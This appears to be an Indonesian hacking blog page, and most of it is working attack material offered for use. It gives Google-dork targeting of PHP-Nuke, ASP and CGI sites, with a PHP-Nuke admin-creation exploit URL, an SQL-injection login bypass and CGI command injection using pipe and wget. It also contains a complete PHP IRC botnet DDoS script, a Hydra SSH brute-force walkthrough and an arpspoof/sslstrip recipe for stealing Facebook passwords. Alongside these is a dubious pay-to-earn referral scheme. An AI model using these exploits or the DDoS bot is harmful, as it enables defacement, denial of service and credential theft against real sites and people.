• Contact

    • New Post

    Archive

    CARA DEFACE WEB

    web jomla defaceDeface situs php nuke pakai google. Coba search di google:

    .com/nuke/index.php atau .org/nuke/index.php

    Jika sudah ditemukan targetnya, tinggal ikuti langkah berikut :

    1. http://www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
    2. Masukkan bug ini di belakang situs tadi : ?op=AddAuthor&add_aid=smartbekantan&add_name=God&add_pwd=render07&add_email=bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
    misalnya : http://www.target.com/nuke/admin.php?
    http://www.target.com/nuke/admin.php?op=AddAuthor&add_aid=smartbekantan&add_
    name=
    God&add_pwd=render07&add_email=
    bekantan@yahoo.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox
    Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.

    Tapi jika berhasil, maka di url/browsing akan muncul http://www.target.com/nuke/admin.php?op=mod_author
    4. Login, dan masukan id & password tadi.
    Masih ingat kan ?
    id=smartbekantan => liat yg diatas tadi
    password=render07 => liat yg diatas tadi. Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut.

    Deface asp dengan sql injection

    1. buka browsing/url http://www.google.co.id
    2. ketik site:go.id login.asp
    misal nya kita dapat target http://www.situstarget.com/
    login.asp
    3. username dan pass ketik ‘or”=’
    4. buka satu persatu file yg ada disana
    5. cari file yg bisa kita ubah/deface
    6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
    7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
    deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
    page=”coart_frontpage.html|pwd|”
    page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
    …/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
    page:.*html+site:.us atau http://www.google.co.id/
    search?q=allinurl*.cgi%3Fpage%3D*.html
    +site:.com&hl=id&lr=&start=10&sa=N
    target harus file .html diujungnya jika ingin ditambah |pwd|

    Mudah kan? Kamu sudah jadi seorang defacer sekarang :)

    tapi ingat #Hacker not a destroyer :D

    1. buka browsing/url http://www.google.co.id
    2. ketik site:go.id login.asp
    misal nya kita dapat target http://www.situstarget.com/
    login.asp
    3. username dan pass ketik ‘or”=’
    4. buka satu persatu file yg ada disana
    5. cari file yg bisa kita ubah/deface
    6. buka browsing/url baru lalu ketikkan target tadi misalnya http://www.situsarget.com
    7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.
    deface cgi https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/web_store.cgi?page=coart_frontpage.html <<<
    page=”coart_frontpage.html|pwd|”
    page=”coart_frontpage.html|wget” nya =’”>https://bronte.netpresence.com.au/~wolfsecu/arai.html
    …/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =”"> allinurl*.cgi *
    page:.*html+site:.us atau http://www.google.co.id/
    search?q=allinurl*.cgi%3Fpage%3D*.html
    +site:.com&hl=id&lr=&start=10&sa=N
    target harus file .html diujungnya jika ingin ditambah |pwd|

    SCRIPT DDOS



    SCRIPT DDOS
    <?php
    /*
    PHP DDoS Bot
    Version 1.0
    [www.~censored~.org]
    */
    $server="1.3.3.7";
    $Port="6667";
    $nick="bot-";$willekeurig;
    $willekeurig=mt_rand(0,3);
    $nicknummer=mt_rand(100000,999999);
    $Channel="#WauShare";
    $Channelpass="ddos";
    $msg="Farewell.";
    set_time_limit(0);
    $loop = 0; $verbonden = 0;
    $verbinden = fsockopen($server, $Port);
    while ($read = fgets($verbinden,512)) {
    $read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
    $read2 = explode(" ",$read);
    if ($loop == 0) {
    fputs($verbinden,"nick $nick$nicknummer\n\n");
    fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
    }

    if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

    if ($read2[1] == 251) {
    fputs($verbinden,"join $Channel $Channelpass\n");
    $verbonden++;
    }
    if (eregi("bot-op",$read)) {
    fputs($verbinden,"mode $Channel +o $read2[4]\n");
    }
    if (eregi("bot-deop",$read)) {
    fputs($verbinden,"mode $Channel -o $read2[4]\n");
    }

    if (eregi("bot-quit",$read)) {
    fputs($verbinden,"quit :$msg\n\n");
    break;
    }

    if (eregi("bot-join",$read)) {
    fputs($verbinden,"join $read2[4]\n");
    }

    if (eregi("bot-part",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    }

    if (eregi("ddos-udp",$read)) {
    fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
    $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
    if (!$fp)
    {
    //echo "$errstr ($errno)<br>\n"; //troep
    exit;
    }
    else
    {
    $char = "a";
    for($a = 0; $a < 9999999999999; $a++)
    $data = $data.$char;

    if(fputs ($fp, $data) )
    fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
    else
    fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
    }
    }

    if (eregi("ddos-tcp",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
    $server = $read2[4];
    $Port = $read2[5];

    for($sockets = 0; $sockets < $read2[6]; $sockets++)
    {
    $verbinden = fsockopen($server, $Port);
    }
    }

    if (eregi("ddos-http",$read)) {
    fputs($verbinden,"part $read2[4]\n");
    fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
    $Webserver = $read2[4];
    $Port = $read2[5];

    $Aanvraag = "GET / HTTP/1.1\r\n";
    $Aanvraag .= "Accept: */*\r\n";
    $Aanvraag .= "Accept-Language: nl\r\n";
    $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
    $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
    $Aanvraag .= "Host: $read2[4]\r\n";
    $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

    for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
    {
    $DoS = fsockopen($Webserver, $Port);
    fwrite($DoS, $Aanvraag);
    fclose($DoS);
    }
    }
    $loop++;

    }
    ?>

    Cara Melakukan Penyerangan Menggunakan Brute Force Attack Dengan Teknik Hydra di BackTrack

    cara melakukan brute forceLangkah pertama adalah memastikan ip target dengan cara mem-ping-nya. Selelah ping berhasil, maka mulailah menyerang dengan mengetikkan hydra –help seperti gambar berikut ini:




    Setelah anda mengetikkan hydra –help, maka yang harus anda cari adalah tulisan seperti gambar dibawah ini:



    Gambar di atas bisa saja menjadi acuan anda dalam melakukan penyerangan berikutnya. Nah, setelah itu lakukan langkah berikut ini:



    Gambar di atas adalah untuk login ssh melaui computer kita sendiri sementara ip yang ada di atas merupakan ip computer korban lengkap dengan Id dan Passwordnya . Hehehe….

    Ok, setelah itu maka langkah berikut ini wajib dilakukan:



    Setelah melakukan perintah seperti gambar di atas, maka mulailah menyerang target anda dengan menggunakan perintah berikut ini:


    Gambar diatas akan ada dialog permintaan password dari target yang akan kita serang, masukkanlah password yang sudah anda ketahui digambar sebelumnya. Dan gambar berikut ini menjadi penuntas serangan anda:



    Setelah berhasil melakukan perintah seperti gambar di atas, maka computer korban telah anda kuasai penuh.. heheeh sehingga anda bisa melakukan perinta seperti reboot dan lain sebagainya. Jiak anda menuliskan reboot pada terminal maka computer korban akan secara otomatis melakukan restart. Atau anda bisa melakukan perintah sepeti gambar dibawah ini:



    Perintah diatas akan membuat CD Driver ter ejeck sendiri……..
    selamat mencoba

    TUTORIAL COINGENERATION





    Digital Generation merupakan program gratis yang akan membayar kita $0.0001 tiap 8 detik tanpa harus melakukan apapun, cukup install softwarenya dan kita tinggal saja, $ akan mengalir dengan sendirinya atau bisa disambil dengan aktifitas lainnya, seperti facebook / surfing atau aktifitas internet lainnya. hanya bermodalkan koneksi internet saja dan biaya pulsa regular sesuai dengan kebijakan operator.

    Setiap 8 detik earning: $0.0001 Potensi earning selama 24 jam jika komputer/laptop tidak mati sedetik pun: $1.08 dan bisa WD Instant setiap hari

    Payment Instant bisa via Payza / Perfect Money

    Minimum Payment:
    Perfect Money (PM): $0.1 (fee $0.00)
    Payza: $1 (fee $0.00)

    Ada 2 cara untuk menambah pendapatan kita disini, diantaranya:

    1. Dengan mencari referal (2 level referral)
    Referral level 1: 20% earning
    Referral level 2: 10% earning

    Referral adalah orang yang kita ajak dalam program ini melalui link unik yang kita dapatkan ketika kita sudah menjadi bagian dari program ini. ketika kita mau mengajak orang entah teman atau kerabat atau pemain bisnis. Maka, kita tinggal memberikan link unik itu ke mereka. setelah mereka bergabung melalui link tersebut. Maka, setiap mereka mendapatkan komisi. Maka, kita pun akan mendapatkan komisi juga dari program ini.

    2. Dengan membeli thread (maksimal 100 thread/akun)
    1 thread mempunyai masa aktif 12 bulan. untuk pertama kalo kita bergabung, kita akan diberi modal 1 thread gratis yang bisa menghasilkan $1/hari, $30/bulan, $365/tahun, Namun, bila kita ingnin menambah penghasilan kita lebih dari 1$, kita bisa membeli Thread dengan Harga 1 thread adalah $50 yang nanti nya juga akan menghasilkan $365/tahun. Sehingga bila kita misalkan mempunyai 5 thread maka bisa dipastikan penghasilan kita setiap hari adalah 1$/hari x 5 thread = $5/hari. Dan kita diamkan saja biarkan thread tersebut bekerja untuk kita. berikut ini penampakan Trial Thread yang kita peroleh ketika bergabung.


    Perincian perolehan yang akan kita dapatkan baik yang FREE atau Berbayar



    langkah-langkah perndaftaran :

    1. KLIK DISINI atau klik banner paling atas, klik register


    isi name, email, password dan captcha kemudian klik "send"
    kemudia cek email. lakukan login ke website tersebut.

    2. kemudian setelah itu, masuk ke menu Personal. klik menu tersebut kemudian pilih menu Profil. maka akan tampak seperti gambar dibawah ini:



    isilah semua kolom tersebut dan hal yang wajib adalah verifikasi ponsel. isikan nomor ponsel pada bagian kolom Phone. Gunakan kode area negara (untuk indonesia menggunakan +62xxx)

    3. Beberapa saat akan dapat sms dari +447937946882, kemudian reply sms nya dengan memasukkan angka (kode) yang dikirim, ingat cuma angkanya saja yang dikirim balik. dan ini akan dikenakan pulsa regular dari operator masing-masing. setelah dikirim sekitar beberapa menit akun akan terverifikasi. bila sudah terverifikasi, maka akan tampak tulisan disamping nomor ponsel seperti ini (Successful verification)

    4. ketika sudah terverifikasi, silahkan Download softwarenya dengan klik menu "download" save file.



    5. Setelah selesai download kemudian install softwarenya. Softwarenya sangat ringan, penampakkanya seperti ini. INGAT!! Jangan jalankan (launch) software tersebut ketika Thread belum diaktifiasi oleh admin agar perhitungan komisi yang kita peroleh akurat karena dimulai dari detik 0 (nol).


    setelah dijalankan softwarenya, lihat di bagian active thread. kalau active thread angkanya 1 berarti sudah mulai dapat earning. Tapi, kalau angkanya masih nol (0) bisa kirim ticket ke admin bagian TRIAL, contoh tiketnya bisa dilihat dibawah:


    gambar diatas sebagai contoh request gan. kalo mau request usahakan jangan sama dengan yang diatas, edit2 dikit yach!!!

    tiket akan dibalas sekitar 1-2 jam dan thread akan diaktifkan.

    6. Jika sudah aktif artinya sudah siap mengalirkan dollar setiap kita online (koneksi internet nyala), software bisa di minimize.

    catatan: software dijamin TIDAK akan memakan bandwidth ataupun kuota karena sangat ringan. kuota pun irit karena 1 jam software nyala cuma terkena kuota kurang dari 1mb. kalaupun cuma nyalain software ini hasilnya bisa buat beli pulsa modem berlipat-lipat. hehe
    NB: Dalam program ini dilarang menggunakan VPS
    Bila earning sudah mencukupi bisa langsung di WD, instant (hanya hitungan detik masuk rekening), kalau via PM (perfect Money) cukup online saja sekitar 2 jam lebih sudah dapat $0.1. tapi biasanya earning di software belum sama dengan di web nya karena earning akan di update sekitar jam 12 siang setiap harinya, jd bisa WD setelah jam 12 siang.


    jika earning sudah mencukupi,klik "request payout for your earning", pilih payment processor dan klik "ok"

    Payout akan dibayar secara instant dan langsung masuk ke rekening





    Keuntungan bila agan join dilink saya yaitu dapet FULL SUPPORT 100% dari saya dari awal sampe selese

    REPAIR WINDOWS MENGGUNAKAN COMMAND PROMPT


      repair windows pakai cmd
    • Langkah pertama, klik tombol start yang ada pada pojok kiri bawah kemudian menuju ke command prompt dengan cara mengetik cmd.
    • Klik kanan pada cmd dan pilih Run As Administrator. Setelah itu akan muncul halaman baru dari command prompt.
    • Setelah itu ketikkan Sfc /scannow pada halaman baru yang muncul lalu tekan enter di keyboard.
    • Tunggu hingga proses selesai. Proses ini akan memperbaiki file windows sobat yang hilang maupun corrupt.


    Setelah semua proses selesai, sobat akan diminta untuk restart komputer untuk mengupdate segala informasi yang ada pada file windows sobat. Proses ini membutuhkan waktu yang cukup lama.

    Nah sekarang tinggal menunggu saja hingga proses selesai, jika proses berjalan dengan baik maka windows sobat akan kembali normal seperti sebelum terjadinya kerusakan file. Namun kadang kala proses ini membutuhkan cd installer untuk memperbaiki file windows yang hilang, jadi tergantung seberapa parah kerusakan file windowsnya. Demikianlah Semoga tips kali ini membantu sobat yang ingin memperbaiki windows namun tidak memiliki cd master windows nya.

    APLIKASI INTERNETAN GRATIS

    CARA BERINTERNATAN GRATISOke langsung saja untuk persiapan alat-alat buat internetan gratis :D heheheh>>>>>

    yang pake kartu xl langsung klik diisini
    account ssh gratis update setiap hari klik disini
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

    CARA HACK AKUN FACEBOOK DENGAN BACKTRACK

    assalammualaikum wr.wb





    apa kabar para blogger dan pengunjung setia jordan blog ini? :D . setelah sekian lama saya ga posting , kali ini saya akan berbagi tricks yaitu seperti judul yang telah disebutkan "Cara Hacking Facebook Menggunakan Backtrack 5 r3 . apa itu Backtrack? backtrack yaitu sebuah sistem operasi LINUX. oke dari pada penasaran pengen tau lebih jelasnya mari di simak dan di perhatikan betul perintah-perintahnya :

    mula - mula anda masuk terminal, terus kalo udah masuk kita masuk ke root dulu dengan memberikan perintah ini SUDO SU-

    Pertama-tama siapkan tool yang akan kita gunakan

    Arpspoof
    Sslstrip-0.9
    OS Linux 32 Bit

    Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :


    1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

    2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz

    3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9
    4) Dan untuk menginstal ketikkan : python setup.py install


    Lakukan langkah berikut ( Jika paket sudah terinstall )

    Gunakan cara ini setiap kali jika ingin mencuri password lagi


    1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward

    2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr

    3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1)adalah gateway dari jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari netstat -nr tadi)

    5) Kemudian buka terminal baru lalu ketikkan : sslstrip -l 8080 untuk mengaktifkan cookies yang akan kita baca 

    6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.

    7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log

    8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang menggunakan username dan password WALAAA kita akan mengetahuinya.

    karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah find "pass: tanpa petik agar kita lebih mudah menemukannya


    HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA KAWAN :D


    sekian Tricks Hacking dari saya, semoga berhasil Gan>>>>>>>>>>

    METASPLOIT FOR WINDOWS

    Kali ini saya akan share sedikit tentang metasploit dengan aplikasi hacker yaitu metasploit framework  versi 2.6, aplikasi ini berfungsi untuk melakukan exploitasi kelemahan suatu system, aplikasi ini juga bisa untuk penetration testing ke system windows, unix/linux, dan mac os tetapi yang lebih cendrung  exploitable adalah windows service pack.1. untuk lebih lengkap langsung aja download aplikasinya disini 
    untuk tutorialnya download disini